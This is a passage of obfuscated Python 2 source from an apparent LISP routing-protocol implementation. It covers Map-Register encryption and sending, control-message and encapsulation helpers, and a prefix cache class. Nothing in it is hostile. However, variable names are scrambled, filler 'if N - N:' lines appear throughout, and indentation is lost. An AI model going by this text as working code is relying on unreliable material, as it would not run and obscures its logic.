if 85 - 85: I1IiiI / II111iiii * OoO0O00 + ooOoO0o / OoO0O00 % OOooOOo
if 100 - 100: I1Ii111 % OoooooooOO % OoOoOO00 % I1IiiI
if 32 - 32: OoO0O00 + OOooOOo . OoO0O00 - Oo0Ooo
if 12 - 12: I1IiiI * OoO0O00 - II111iiii . i1IIi
if 86 - 86: OOooOOo / OoooooooOO - IiII
packet = lisp_compute_auth ( packet , map_register , ms . password )
if 56 - 56: I1ii11iIi11i - i1IIi * OoooooooOO * O0 * I1IiiI - I1Ii111
if 32 - 32: OoooooooOO . OOooOOo . OoO0O00 . IiII / I11i % i1IIi
if 21 - 21: O0 . OoO0O00 * I1ii11iIi11i % iII111i + OoooooooOO
if 8 - 8: oO0o * iII111i * I11i
if 30 - 30: I1Ii111
if ( ms . ekey != None ) :
II11iI11i1 = ms . ekey . zfill ( 32 )
OO000OOOo0Oo = "0" * 8
o0OoOo0o0O00 = chacha . ChaCha ( II11iI11i1 , OO000OOOo0Oo ) . encrypt ( packet [ 4 : : ] )
packet = packet [ 0 : 4 ] + o0OoOo0o0O00
iIIi1iI1I1IIi = bold ( "Encrypt" , False )
lprint ( "{} Map-Register with key-id {}" . format ( iIIi1iI1I1IIi , ms . ekey_id ) )
if 61 - 61: iII111i
if 50 - 50: Ii1I / I1IiiI . O0
i1oo = ""
if ( lisp_decent_pull_xtr_configured ( ) ) :
i1oo = ", decent-index {}" . format ( bold ( ms . dns_name , False ) )
if 69 - 69: II111iiii % O0 + OOooOOo * ooOoO0o
if 32 - 32: OoOoOO00 + OoOoOO00 / I1IiiI * OOooOOo
lprint ( "Send Map-Register to map-server {}{}{}" . format ( Ii1II1I11i1I . print_address ( ) , ", ms-name '{}'" . format ( ms . ms_name ) , i1oo ) )
if 91 - 91: OoooooooOO - iII111i % OoO0O00
lisp_send ( lisp_sockets , Ii1II1I11i1I , LISP_CTRL_PORT , packet )
return
if 38 - 38: OOooOOo + iIii1I11I1II1 * I1ii11iIi11i . IiII * OOooOOo
if 61 - 61: Oo0Ooo
if 75 - 75: IiII
if 99 - 99: OoooooooOO . IiII + I11i % I1IiiI
if 19 - 19: I1Ii111 * ooOoO0o . o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 76 - 76: II111iiii % I1IiiI * I1ii11iIi11i
if 74 - 74: Ii1I
if 55 - 55: iII111i % o0oOOo0O0Ooo - oO0o % OoooooooOO
def lisp_send_ipc_to_core ( lisp_socket , packet , dest , port ) :
iI1Iii1i1 = lisp_socket . getsockname ( )
dest = dest . print_address_no_iid ( )
if 18 - 18: OoooooooOO - I1ii11iIi11i
lprint ( "Send IPC {} bytes to {} {}, control-packet: {}" . format ( len ( packet ) , dest , port , lisp_format_packet ( packet ) ) )
if 94 - 94: OOooOOo . Oo0Ooo + Ii1I * o0oOOo0O0Ooo
if 79 - 79: OOooOOo + Oo0Ooo
packet = lisp_control_packet_ipc ( packet , iI1Iii1i1 , dest , port )
lisp_ipc ( packet , lisp_socket , "lisp-core-pkt" )
return
if 33 - 33: iIii1I11I1II1
if 75 - 75: I1Ii111 / iIii1I11I1II1 . OoooooooOO
if 98 - 98: iIii1I11I1II1 / I1IiiI + i1IIi
if 80 - 80: II111iiii . Oo0Ooo * oO0o % II111iiii / I1ii11iIi11i
if 66 - 66: iII111i / OoO0O00 / i11iIiiIii
if 99 - 99: OOooOOo
if 51 - 51: i11iIiiIii . o0oOOo0O0Ooo / iII111i
if 53 - 53: oO0o / i1IIi - Oo0Ooo - i1IIi + IiII
def lisp_send_map_reply ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Reply to {}" . format ( dest . print_address_no_iid ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 79 - 79: oO0o % o0oOOo0O0Ooo / o0oOOo0O0Ooo % iII111i
if 56 - 56: Oo0Ooo % I1ii11iIi11i
if 53 - 53: OoO0O00 . I11i - ooOoO0o
if 11 - 11: I11i + i11iIiiIii / oO0o % oO0o * o0oOOo0O0Ooo / OoOoOO00
if 74 - 74: oO0o . I1Ii111 . II111iiii
if 92 - 92: I1Ii111 % OoooooooOO * I1Ii111
if 78 - 78: Oo0Ooo . I11i . oO0o + O0 / O0
if 41 - 41: iII111i * OoO0O00 - OoO0O00
def lisp_send_map_referral ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Referral to {}" . format ( dest . print_address ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 72 - 72: o0oOOo0O0Ooo + oO0o . I1ii11iIi11i + OoO0O00 / I1Ii111
if 58 - 58: Oo0Ooo / II111iiii % OoooooooOO % II111iiii
if 39 - 39: i1IIi
if 16 - 16: OoOoOO00 % iIii1I11I1II1 + Ii1I - o0oOOo0O0Ooo . Oo0Ooo + i1IIi
if 59 - 59: i1IIi
if 37 - 37: OoO0O00 / I1ii11iIi11i / OoOoOO00
if 15 - 15: I1IiiI % iIii1I11I1II1 . I1Ii111
if 71 - 71: I11i - Ii1I + i11iIiiIii % I1ii11iIi11i - OoO0O00 - OOooOOo
def lisp_send_map_notify ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Notify to xTR {}" . format ( dest . print_address ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 71 - 71: OOooOOo
if 27 - 27: OOooOOo * O0 * i11iIiiIii / OoOoOO00 - i1IIi
if 73 - 73: iII111i / I1IiiI * ooOoO0o
if 85 - 85: I11i + I11i + oO0o - OoOoOO00
if 15 - 15: OoO0O00
if 88 - 88: Ii1I % i1IIi / I1Ii111
if 2 - 2: Ii1I . IiII % OoOoOO00
def lisp_send_ecm ( lisp_sockets , packet , inner_source , inner_sport , inner_dest ,
outer_dest , to_etr = False , to_ms = False , ddt = False ) :
if 42 - 42: OoOoOO00 * OoO0O00 * IiII - IiII % Oo0Ooo . IiII
if ( inner_source == None or inner_source . is_null ( ) ) :
inner_source = inner_dest
if 38 - 38: I1Ii111 . IiII - ooOoO0o . i11iIiiIii
if 35 - 35: i11iIiiIii
if 62 - 62: O0 - o0oOOo0O0Ooo + I1Ii111 * I1ii11iIi11i / OOooOOo
if 87 - 87: Oo0Ooo / OoooooooOO + O0 / o0oOOo0O0Ooo % II111iiii - O0
if 63 - 63: OOooOOo - OoO0O00 * i1IIi - I1ii11iIi11i . I1IiiI
if 59 - 59: i11iIiiIii . OOooOOo % Oo0Ooo + O0
if ( lisp_nat_traversal ) :
oo0O = lisp_get_any_translated_port ( )
if ( oo0O != None ) : inner_sport = oo0O
if 84 - 84: I1Ii111 / O0 - IiII . I11i / o0oOOo0O0Ooo
I1i1ii = lisp_ecm ( inner_sport )
if 12 - 12: i11iIiiIii / Ii1I + i1IIi
I1i1ii . to_etr = to_etr if lisp_is_running ( "lisp-etr" ) else False
I1i1ii . to_ms = to_ms if lisp_is_running ( "lisp-ms" ) else False
I1i1ii . ddt = ddt
oO00O = I1i1ii . encode ( packet , inner_source , inner_dest )
if ( oO00O == None ) :
lprint ( "Could not encode ECM message" )
return
if 76 - 76: o0oOOo0O0Ooo + i1IIi * OoooooooOO % Oo0Ooo / Oo0Ooo . I1IiiI
I1i1ii . print_ecm ( )
if 87 - 87: iIii1I11I1II1 / OOooOOo . I11i . o0oOOo0O0Ooo
packet = oO00O + packet
if 75 - 75: II111iiii + O0 * II111iiii * i11iIiiIii
oo0o00OO = outer_dest . print_address_no_iid ( )
lprint ( "Send Encapsulated-Control-Message to {}" . format ( oo0o00OO ) )
Ii1II1I11i1I = lisp_convert_4to6 ( oo0o00OO )
lisp_send ( lisp_sockets , Ii1II1I11i1I , LISP_CTRL_PORT , packet )
return
if 88 - 88: OoO0O00 * OoOoOO00 * OoooooooOO - OoOoOO00
if 85 - 85: ooOoO0o
if 26 - 26: i11iIiiIii - OoooooooOO + i11iIiiIii
if 79 - 79: Oo0Ooo * oO0o . oO0o / Oo0Ooo * IiII
if 14 - 14: Ii1I % I1IiiI / oO0o + OoO0O00 * ooOoO0o . Oo0Ooo
if 99 - 99: IiII * OOooOOo - OoOoOO00 + IiII
if 22 - 22: ooOoO0o - I1Ii111 - II111iiii / IiII + iII111i
LISP_AFI_GEO_COORD = - 3
LISP_AFI_IID_RANGE = - 2
LISP_AFI_ULTIMATE_ROOT = - 1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
if 5 - 5: O0 * Ii1I
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
if 78 - 78: iII111i * iIii1I11I1II1 . OoO0O00 . OoOoOO00 % I1Ii111
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
if 77 - 77: OOooOOo / OoooooooOO
if 11 - 11: iIii1I11I1II1 - Ii1I - OoOoOO00 . oO0o / I1ii11iIi11i
if 79 - 79: i11iIiiIii % o0oOOo0O0Ooo * II111iiii . i1IIi * Ii1I - i11iIiiIii
if 31 - 31: IiII / o0oOOo0O0Ooo
if 27 - 27: Oo0Ooo
if 32 - 32: Oo0Ooo * i11iIiiIii % I1IiiI - i11iIiiIii - I1Ii111 % I1ii11iIi11i
if 35 - 35: o0oOOo0O0Ooo % iII111i / O0 * I1IiiI . o0oOOo0O0Ooo / OOooOOo
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
if 81 - 81: I1ii11iIi11i - i11iIiiIii
if 49 - 49: iII111i * I11i - II111iiii . o0oOOo0O0Ooo
if 52 - 52: Ii1I + Ii1I - II111iiii . O0 + I1ii11iIi11i
if 60 - 60: i11iIiiIii + IiII
if 41 - 41: I1Ii111 * o0oOOo0O0Ooo + Oo0Ooo
if 86 - 86: Ii1I / oO0o
def byte_swap_64 ( address ) :
o0o00O0oOooO0 = ( ( address & 0x00000000000000ff ) << 56 ) | ( ( address & 0x000000000000ff00 ) << 40 ) | ( ( address & 0x0000000000ff0000 ) << 24 ) | ( ( address & 0x00000000ff000000 ) << 8 ) | ( ( address & 0x000000ff00000000 ) >> 8 ) | ( ( address & 0x0000ff0000000000 ) >> 24 ) | ( ( address & 0x00ff000000000000 ) >> 40 ) | ( ( address & 0xff00000000000000 ) >> 56 )
if 40 - 40: OoO0O00 % oO0o + Oo0Ooo
if 60 - 60: II111iiii / Ii1I
if 14 - 14: iII111i - Oo0Ooo / o0oOOo0O0Ooo * oO0o / Oo0Ooo - I1IiiI
if 89 - 89: i1IIi / I1Ii111 + Ii1I - i1IIi
if 66 - 66: OoooooooOO
if 68 - 68: iII111i + I1Ii111
if 90 - 90: o0oOOo0O0Ooo
if 48 - 48: iII111i + Ii1I
return ( o0o00O0oOooO0 )
if 45 - 45: oO0o / iIii1I11I1II1 % O0 % IiII % I1ii11iIi11i
if 89 - 89: OOooOOo - I1Ii111 - iII111i
if 67 - 67: oO0o
if 76 - 76: I1IiiI % I1IiiI - IiII / OoOoOO00 / I1ii11iIi11i
if 42 - 42: I1IiiI + I1ii11iIi11i + Oo0Ooo * i1IIi - II111iiii
if 15 - 15: o0oOOo0O0Ooo
if 60 - 60: I1ii11iIi11i / I1Ii111
if 13 - 13: I1Ii111
if 52 - 52: II111iiii / OoO0O00 . Ii1I
if 68 - 68: iII111i
if 67 - 67: I1IiiI * I1IiiI
if 100 - 100: iII111i * iII111i . Oo0Ooo
if 10 - 10: Oo0Ooo % ooOoO0o * Oo0Ooo
if 48 - 48: ooOoO0o + II111iiii
if 73 - 73: II111iiii
class lisp_cache_entries ( ) :
def __init__ ( self ) :
self . entries = { }
self . entries_sorted = [ ]
if 63 - 63: i11iIiiIii . Oo0Ooo . OOooOOo - II111iiii
if 35 - 35: II111iiii + IiII
if 66 - 66: o0oOOo0O0Ooo % IiII
class lisp_cache ( ) :
def __init__ ( self ) :
self . cache = { }
self . cache_sorted = [ ]
self . cache_count = 0
if 39 - 39: IiII
if 18 - 18: iII111i % o0oOOo0O0Ooo - i1IIi
def cache_size ( self ) :
return ( self . cache_count )
if 53 - 53: o0oOOo0O0Ooo + IiII - ooOoO0o % i11iIiiIii - i11iIiiIii - I1Ii111
if 79 - 79: II111iiii + i11iIiiIii . OOooOOo . I11i / iIii1I11I1II1
def build_key ( self , prefix ) :
if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) :
iiIi = 0
elif ( prefix . afi == LISP_AFI_IID_RANGE ) :
iiIi = prefix . mask_len
else :
iiIi = prefix . mask_len + 48
if 62 - 62: O0
if 52 - 52: OoooooooOO . oO0o
IiIIi11i111 = lisp_hex_string ( prefix . instance_id ) . zfill ( 8 )
IiiiII = lisp_hex_string ( prefix . afi ) . zfill ( 4 )
if 38 - 38: ooOoO0o . i1IIi / iII111i + I1IiiI - II111iiii
if ( prefix . afi > 0 ) :
if ( prefix . is_binary ( ) ) :
oOOoO0O = prefix . addr_length ( ) * 2
o0o00O0oOooO0 = lisp_hex_string ( prefix . address ) . zfill ( oOOoO0O )
else :
o0o00O0oOooO0 = prefix . address
if 21 - 21: i11iIiiIii + II111iiii - i1IIi / OoooooooOO * OOooOOo % Oo0Ooo
elif ( prefix . afi == LISP_AFI_GEO_COORD ) :
IiiiII = "8003"
o0o00O0oOooO0 = prefix . address . print_geo ( )
else :
IiiiII = ""
o0o00O0oOooO0 = ""
if 59 - 59: Ii1I
if 77 - 77: I1ii11iIi11i * Ii1I * O0 * I1IiiI % OoO0O00 - iIii1I11I1II1
o0Oo = IiIIi11i111 + IiiiII + o0o00O0oOooO0
return ( [ iiIi , o0Oo ] )
if 6 - 6: i11iIiiIii . I11i - OoooooooOO
if 26 - 26: I1IiiI
def add_cache ( self , prefix , entry ) :
if ( prefix . is_binary ( ) ) : prefix . zero_host_bits ( )
iiIi , o0Oo = self . build_key ( prefix )
if ( self . cache . has_key ( iiIi ) == False ) :
self . cache [ iiIi ] = lisp_cache_entries ( )
self . cache_sorted = self . sort_in_entry ( self . cache_sorted , iiIi )
if 26 - 26: IiII . Ii1I / IiII - OoO0O00 % OoO0O00
if ( self . cache [ iiIi ] . entries . has_key ( o0Oo ) == False ) :
self . cache_count += 1
if 72 - 72: OoooooooOO * II111iiii + OoO0O00 % iIii1I11I1II1 . I1ii11iIi11i % OoooooooOO
self . cache [ iiIi ] . entries [ o0Oo ] = entry
if 19 - 19: OoOoOO00 + I1Ii111
if 19 - 19: I1ii11iIi11i / I1Ii111 + OoooooooOO - O0
def lookup_cache ( self , prefix , exact ) :
IIIII , o0Oo = self . build_key ( prefix )
if ( exact ) :
if ( self . cache . has_key ( IIIII ) == False ) : return ( None )
if ( self . cache [ IIIII ] . entries . has_key ( o0Oo ) == False ) : return ( None )
return ( self . cache [ IIIII ] . entries [ o0Oo ] )
if 32 - 32: iII111i
if 82 - 82: I1IiiI - o0oOOo0O0Ooo + OoO0O00 + OoOoOO00 + i1IIi
ooOoOO0o = None
for iiIi in self . cache_sorted :
if ( IIIII < iiIi ) : return ( ooOoOO0o )
for i1ii1i1Ii11 in self . cache [ iiIi ] . entries . values ( ) :
if ( prefix . is_more_specific ( i1ii1i1Ii11 . eid ) ) : ooOoOO0o = i1ii1i1Ii11
if 74 - 74: iIii1I11I1II1
if 8 - 8: OOooOOo % o0oOOo0O0Ooo
return ( ooOoOO0o )
if 36 - 36: Ii1I % OoooooooOO
if 31 - 31: Ii1I / Ii1I / Ii1I / o0oOOo0O0Ooo / I11i
def delete_cache ( self , prefix ) :
iiIi , o0Oo = self . build_key ( prefix )
if ( self . cache . has_key ( iiIi ) == False ) : return
if ( self . cache [ iiIi ] . entries . has_key ( o0Oo ) == False ) : return
self . cache [ iiIi ] . entries . pop ( o0Oo )
self . cache_count -= 1
if 24 - 24: i1IIi - Oo0Ooo % Oo0Ooo
if 29 - 29: IiII
def walk_cache ( self , function , parms ) :
for iiIi in self . cache_sorted :
for i1ii1i1Ii11 in self . cache [ iiIi ] . entries . values ( ) :
OO0OO0oO0o000 , parms = function ( i1ii1i1Ii11 , parms )
if ( OO0OO0oO0o000 == False ) : return ( parms )
if 65 - 65: OoooooooOO % OoOoOO00 % OoOoOO00 * IiII / i11iIiiIii
if 5 - 5: i1IIi . OoooooooOO . iIii1I11I1II1 . ooOoO0o - O0 . iII111i
return ( parms )
if 60 - 60: I1ii11iIi11i / I1Ii111
if 10 - 10: OoO0O00 * iIii1I11I1II1 / I11i % II111iiii . OoOoOO00 / I1IiiI
def sort_in_entry ( self , table , value ) :
if ( table == [ ] ) : return ( [ value ] )
if 4 - 4: Oo0Ooo * o0oOOo0O0Ooo
oO0Oo0O = table
while ( True ) :
if ( len ( oO0Oo0O ) == 1 ) :
if ( value == oO0Oo0O [ 0 ] ) : return ( table )
ooo = table . index ( oO0Oo0O [ 0 ] )
if ( value < oO0Oo0O [ 0 ] ) :
return ( table [ 0 : ooo ] + [ value ] + table [ ooo : : ] )
if 45 - 45: Ii1I % OOooOOo * Ii1I - iIii1I11I1II1
if ( value > oO0Oo0O [ 0 ] ) :
return ( table [ 0 : ooo + 1 ] + [ value ] + table [ ooo + 1 : : ] )
if 18 - 18: I1Ii111 / Oo0Ooo % Ii1I + OoO0O00
if 69 - 69: iII111i % I1ii11iIi11i
ooo = len ( oO0Oo0O ) / 2
oO0Oo0O = oO0Oo0O [ 0 : ooo ] if ( value < oO0Oo0O [ ooo ] ) else oO0Oo0O [ ooo : : ]
if 19 - 19: IiII
if 35 - 35: OoOoOO00
return ( [ ] )
if 18 - 18: II111iiii . OoOoOO00 + I1ii11iIi11i * oO0o + OoooooooOO
if 39 - 39: I1IiiI * ooOoO0o / i11iIiiIii - oO0o - oO0o + O0
def print_cache ( self ) :
lprint ( "Printing contents of {}: " . format ( self ) )
if ( self . cache_size ( ) == 0 ) :
lprint ( " Cache is empty" )
return
if 73 - 73: OOooOOo
for iiIi in self . cache_sorted :
for o0Oo in self . cache [ iiIi ] . entries :
i1ii1i1Ii11 = self . cache [ iiIi ] . entries [ o0Oo ]
lprint ( " Mask-length: {}, key: {}, entry: {}" . format ( iiIi , o0Oo ,
i1ii1i1Ii11 ) )
if 44 - 44: I1ii11iIi11i * i1IIi - iIii1I11I1II1 - oO0o - oO0o * II111iiii
if 98 - 98: Oo0Ooo + ooOoO0o / OOooOOo . iIii1I11I1II1 . I1IiiI . OoOoOO00
if 92 - 92: i1IIi + OoOoOO00 * i1IIi / IiII
if 4 - 4: oO0o % OoO0O00 + IiII + o0oOOo0O0Ooo
if 82 - 82: O0 / I1Ii111 + OOooOOo . IiII + Ii1I
if 31 - 31: i1IIi * OoO0O00 - Ii1I + I11i
if 8 - 8: O0 + i1IIi . O0
if 67 - 67: I1IiiI
lisp_referral_cache = lisp_cache ( )
lisp_ddt_cache = lisp_cache ( )
lisp_sites_by_eid = lisp_cache ( )
lisp_map_cache = lisp_cache ( )
lisp_db_for_lookups = lisp_cache ( )
if 42 - 42: ooOoO0o - o0oOOo0O0Ooo % oO0o - ooOoO0o
if 87 - 87: OoooooooOO / O0
if 57 - 57: iIii1I11I1II1 / IiII + OoO0O00 * oO0o + Ii1I
if 76 - 76: i11iIiiIii . OOooOOo / I11i * oO0o % iIii1I11I1II1 . ooOoO0o
if 75 - 75: O0 + I1IiiI
if 67 - 67: OoOoOO00 % OoooooooOO / OoO0O00 - OoO0O00 / O0
if 19 - 19: iIii1I11I1II1 / OOooOOo % I11i % I1IiiI / I1ii11iIi11i
def lisp_map_cache_lookup ( source , dest ) :
if 73 - 73: II111iiii
I1Ii11iI = dest . is_multicast_address ( )
if 26 - 26: II111iiii . iIii1I11I1II1 - I1Ii111 % OOooOOo
if 83 - 83: OOooOOo + OoooooooOO % I1Ii111 % IiII + i11iIiiIii
if 10 - 10: OoooooooOO . Ii1I % I1Ii111 + IiII
if 78 - 78: OoOoOO00 - oO0o . I1ii11iIi11i * i11iIiiIii
o0oO0o00 = lisp_map_cache . lookup_cache ( dest , False )
if ( o0oO0o00 == None ) :
Ii1i1 = source . print_sg ( dest ) if I1Ii11iI else dest . print_address ( )
Ii1i1 = green ( Ii1i1 , False )
dprint ( "Lookup for EID {} not found in map-cache" . format ( Ii1i1 ) )
return ( None )
if 44 - 44: iIii1I11I1II1 * iII111i
if 32 - 32: OoOoOO00
if 65 - 65: iIii1I11I1II1 + iII111i
if 90 - 90: i11iIiiIii - Oo0Ooo
if 31 - 31: OoOoOO00 + OoOoOO00 + OoooooooOO % O0
if ( I1Ii11iI == False ) :
i1iI11i = green ( o0oO0o00 . eid . print_prefix ( ) , False )
dprint ( "Lookup for EID {} found map-cache entry {}" . format ( green ( dest . print_address ( ) , False ) , i1iI11i ) )
if 14 - 14: i1IIi / OoooooooOO . I1IiiI * I1Ii111 + OoO0O00
return ( o0oO0o00 )
if 45 - 45: OoooooooOO * I1Ii111
if 7 - 7: O0
if 42 - 42: o0oOOo0O0Ooo / Ii1I
if 31 - 31: OOooOOo
if 20 - 20: i11iIiiIii * oO0o * ooOoO0o
o0oO0o00 = o0oO0o00 . lookup_source_cache ( source , False )
if ( o0oO0o00 == None ) :
Ii1i1 = source . print_sg ( dest )
dprint ( "Lookup for EID {} not found in map-cache" . format ( Ii1i1 ) )
return ( None )
if 65 - 65: I1ii11iIi11i / Oo0Ooo / I1IiiI + IiII
if 71 - 71: OoO0O00 . I1Ii111 + OoooooooOO
if 9 - 9: OoooooooOO / iIii1I11I1II1 % I1IiiI . I1IiiI / I11i - iII111i
if 60 - 60: I11i - OoO0O00 - OoOoOO00 * ooOoO0o - i1IIi
if 18 - 18: ooOoO0o + i11iIiiIii + O0 + OOooOOo / Ii1I
i1iI11i = green ( o0oO0o00 . print_eid_tuple ( ) , False )
dprint ( "Lookup for EID {} found map-cache entry {}" . format ( green ( source . print_sg ( dest ) , False ) , i1iI11i ) )
if 65 - 65: I1IiiI . ooOoO0o
return ( o0oO0o00 )
if 51 - 51: I1Ii111
if 89 - 89: Oo0Ooo
if 15 - 15: OOooOOo * II111iiii - OOooOOo * iIii1I11I1II1
if 95 - 95: I1Ii111 / OoooooooOO * I11i * OoooooooOO
if 88 - 88: I1IiiI / Oo0Ooo / oO0o + oO0o % OOooOOo + Oo0Ooo
if 63 - 63: o0oOOo0O0Ooo + i11iIiiIii % OOooOOo % iIii1I11I1II1 / I1ii11iIi11i - iII111i
if 72 - 72: iII111i % oO0o . IiII + I1ii11iIi11i . IiII . II111iiii
def lisp_referral_cache_lookup ( eid , group , exact ) :
if ( group and group . is_null ( ) ) :
IiII111IiII1 = lisp_referral_cache . lookup_cache ( eid , exact )
return ( IiII111IiII1 )
if 10 - 10: I11i . ooOoO0o + I11i * Ii1I
if 55 - 55: OOooOOo / iII111i + OoooooooOO - OoooooooOO
if 51 - 51: O0 % Ii1I % Oo0Ooo - O0
if 94 - 94: OoooooooOO - ooOoO0o % I1ii11iIi11i + I1Ii111
if 51 - 51: I1ii11iIi11i . iII111i / i1IIi * ooOoO0o % I11i
if ( eid == None or eid . is_null ( ) ) : return ( None )
if 82 - 82: O0 % OoOoOO00 . iII111i . i1IIi . iII111i - Oo0Ooo
if 58 - 58: O0 * OOooOOo
if 60 - 60: ooOoO0o
if 47 - 47: i11iIiiIii
if 21 - 21: i1IIi - oO0o - Oo0Ooo
if 11 - 11: i1IIi
IiII111IiII1 = lisp_referral_cache . lookup_cache ( group , exact )
if ( IiII111IiII1 == None ) : return ( None )
if 77 - 77: I11i + i1IIi * OoOoOO00 % OoooooooOO
o00ooOoo0000o = IiII111IiII1 . lookup_source_cache ( eid , exact )
if ( o00ooOoo0000o ) : return ( o00ooOoo0000o )
if 31 - 31: Oo0Ooo % OoooooooOO + OoooooooOO * o0oOOo0O0Ooo . I1IiiI
if ( exact ) : IiII111IiII1 = None
return ( IiII111IiII1 )
if 68 - 68: iII111i - iIii1I11I1II1 - OoO0O00 - iII111i . O0 - i11iIiiIii
if 1 - 1: i1IIi * iIii1I11I1II1
if 29 - 29: I11i
if 12 - 12: oO0o % i1IIi - oO0o / ooOoO0o * II111iiii % ooOoO0o
if 6 - 6: IiII / OoO0O00
if 83 - 83: IiII - iIii1I11I1II1 * ooOoO0o - oO0o
if 77 - 77: Ii1I
def lisp_ddt_cache_lookup ( eid , group , exact ) :
if ( group . is_null ( ) ) :
O0oo0OoOO = lisp_ddt_cache . lookup_cache ( eid , exact )
return ( O0oo0OoOO )
if 9 - 9: OOooOOo / OoooooooOO + iII111i
if 52 - 52: IiII / OOooOOo * iIii1I11I1II1 + o0oOOo0O0Ooo
if 20 - 20: I1Ii111
if 33 - 33: i11iIiiIii / I1Ii111 + IiII / II111iiii + I11i
if 13 - 13: i1IIi % iII111i + OoOoOO00 / Ii1I . Ii1I + II111iiii
if ( eid . is_null ( ) ) : return ( None )
if 44 - 44: OoOoOO00 / OoooooooOO % O0 * Ii1I * IiII
if 84 - 84: o0oOOo0O0Ooo * IiII * OOooOOo * iII111i
if 56 - 56: iII111i * II111iiii . OoooooooOO . I11i
if 25 - 25: ooOoO0o % o0oOOo0O0Ooo - i11iIiiIii
if 79 - 79: iII111i - I1IiiI % O0 / Oo0Ooo + OoOoOO00 . Oo0Ooo
if 59 - 59: I1ii11iIi11i * OoOoOO00 / Ii1I
O0oo0OoOO = lisp_ddt_cache . lookup_cache ( group , exact )
if ( O0oo0OoOO == None ) : return ( None )
if 80 - 80: IiII - ooOoO0o / OoOoOO00 / I11i * O0 + oO0o
O00OoO0 = O0oo0OoOO . lookup_source_cache ( eid , exact )
if ( O00OoO0 ) : return ( O00OoO0 )
if 22 - 22: iII111i % oO0o / iII111i * i1IIi / II111iiii
if ( exact ) : O0oo0OoOO = None
return ( O0oo0OoOO )
if 30 - 30: oO0o + Ii1I / I1ii11iIi11i
if 23 - 23: i11iIiiIii * O0 . o0oOOo0O0Ooo + I11i
if 23 - 23: II111iiii . oO0o
if 9 - 9: oO0o
if 22 - 22: Oo0Ooo + Oo0Ooo + I1Ii111
if 39 - 39: II111iiii - Ii1I + I1Ii111 - ooOoO0o % I1Ii111
if 53 - 53: I1IiiI
def lisp_site_eid_lookup ( eid , group , exact ) :
if 53 - 53: iIii1I11I1II1 . Oo0Ooo + Ii1I . II111iiii / I1IiiI
if ( group . is_null ( ) ) :
oOOOO0ooo = lisp_sites_by_eid . lookup_cache ( eid , exact )
return ( oOOOO0ooo )
if 44 - 44: Ii1I / Ii1I / OoO0O00 % ooOoO0o / I11i . I1ii11iIi11i
if 41 - 41: I1ii11iIi11i * ooOoO0o * I11i + O0 * O0 - O0
if 81 - 81: I1Ii111 % OoO0O00 / O0
if 55 - 55: i1IIi - I1Ii111 + I11i
if 93 - 93: I1IiiI % IiII . OoOoOO00 + iII111i
if ( eid . is_null ( ) ) : return ( None )
if 81 - 81: ooOoO0o / I1Ii111 + OOooOOo / Oo0Ooo / OoOoOO00
if 34 - 34: ooOoO0o * iIii1I11I1II1 % i11iIiiIii * OOooOOo - OOooOOo
if 63 - 63: Oo0Ooo / oO0o + iII111i % OoooooooOO * I11i
if 34 - 34: I1IiiI + I1Ii111 % ooOoO0o
if 24 - 24: Ii1I % II111iiii - i11iIiiIii
if 52 - 52: OoO0O00
oOOOO0ooo = lisp_sites_by_eid . lookup_cache ( group , exact )
if ( oOOOO0ooo == None ) : return ( None )
if 76 - 76: ooOoO0o - iII111i % ooOoO0o / oO0o . OOooOOo
if 50 - 50: IiII . i11iIiiIii % I11i
if 22 - 22: i1IIi - II111iiii - OoOoOO00 . iII111i
if 43 - 43: I1Ii111 * OOooOOo - IiII . i11iIiiIii
if 34 - 34: iII111i . OoOoOO00
if 49 - 49: I1ii11iIi11i % oO0o - I1Ii111 . I1ii11iIi11i % II111iiii
if 20 - 20: I1ii11iIi11i . iIii1I11I1II1 - Ii1I % OoO0O00
if 27 - 27: iIii1I11I1II1 / I1Ii111 - I11i . OoO0O00 + ooOoO0o
if 89 - 89: I1IiiI % I11i - OOooOOo
if 71 - 71: OOooOOo % Oo0Ooo - o0oOOo0O0Ooo / I1Ii111 - O0 - oO0o
if 10 - 10: I1IiiI
if 17 - 17: i11iIiiIii % o0oOOo0O0Ooo . ooOoO0o
if 34 - 34: OoooooooOO / iII111i / O0
if 75 - 75: I11i % OOooOOo - OoO0O00 * I11i * IiII
if 11 - 11: I1ii11iIi11i . O0 - iII111i * IiII . i1IIi . iII111i
if 82 - 82: i1IIi * I11i * Ii1I - IiII . i11iIiiIii
if 40 - 40: OOooOOo - OoooooooOO
if 36 - 36: i1IIi % OoOoOO00 - i1IIi
i1I1I = oOOOO0ooo . lookup_source_cache ( eid , exact )
if ( i1I1I ) : return ( i1I1I )
if 5 - 5: I1IiiI . I1IiiI % II111iiii - I1Ii111
if ( exact ) :
oOOOO0ooo = None
else :
O0Ii1IiiiI = oOOOO0ooo . parent_for_more_specifics
if ( O0Ii1IiiiI and O0Ii1IiiiI . accept_more_specifics ) :
if ( group . is_more_specific ( O0Ii1IiiiI . group ) ) : oOOOO0ooo = O0Ii1IiiiI
if 97 - 97: I11i . ooOoO0o
if 87 - 87: oO0o / iIii1I11I1II1 - I11i + OoooooooOO
return ( oOOOO0ooo )
if 79 - 79: I1ii11iIi11i * IiII . I1ii11iIi11i
if 65 - 65: iII111i - Ii1I - II111iiii * O0 + I1ii11iIi11i . iIii1I11I1II1
